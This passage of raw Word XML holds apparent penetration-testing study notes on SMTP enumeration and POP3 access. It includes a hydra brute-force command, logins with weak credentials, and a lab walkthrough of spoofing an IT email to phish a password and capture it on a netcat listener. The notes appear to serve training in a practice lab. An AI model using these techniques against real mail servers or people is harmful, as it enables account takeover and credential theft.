      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 smtp.py root 192.168.50.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 smtp.py johndoe 192.168.50.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E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7EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dpo9xv1ycx65" w:id="348"/>
      <w:bookmarkEnd w:id="348"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For POP3 over plaintext (port 110):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 110</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For POP3s (POP3 over SSL on port 995):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect target:995</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this instead of netcat to connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try STARTTLS authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 110</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in this command initially</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect 192.168.229.137:110 -starttls pop3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you can authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For anonymous login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USER anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce POP3 using hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l jonas -P rockyou.txt -e nsr pop3://192.168.244.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002800">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic commands </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(you don't have to capitalize the commands)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002801">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USER jonas → supply username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002802">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS password123 → supply password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002803">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STAT → shows number of messages and mailbox size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002804">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LIST → lists message IDs and sizes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002805">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RETR 1 → retrieves message 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002806">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DELE 1 → deletes message 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002807">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">QUIT → log out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002808">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002809">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7653338" cy="5162075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="563" name="image462.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image462.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId821"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7653338" cy="5162075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the creds were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sales:sales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you can see we only have 1 message and it had a size of 683</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Form this, they saw </w:t>
      </w:r>
      <w:hyperlink r:id="rId834">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the one sending the email, and SMTP required no authentication, so they could send an email as </w:t>
      </w:r>
      <w:hyperlink r:id="rId835">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And so they did and inside the email they used key words like "Password", "Reset" and "Link" and put the URL of our own computer in the email to "change the password." This is because the email we got legit says that IT team will be sending links to reset password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then set up a listener on our IP for port 80 and when they clicked on the link, we got a POST request sent to our netcat listener which includes the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId836">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
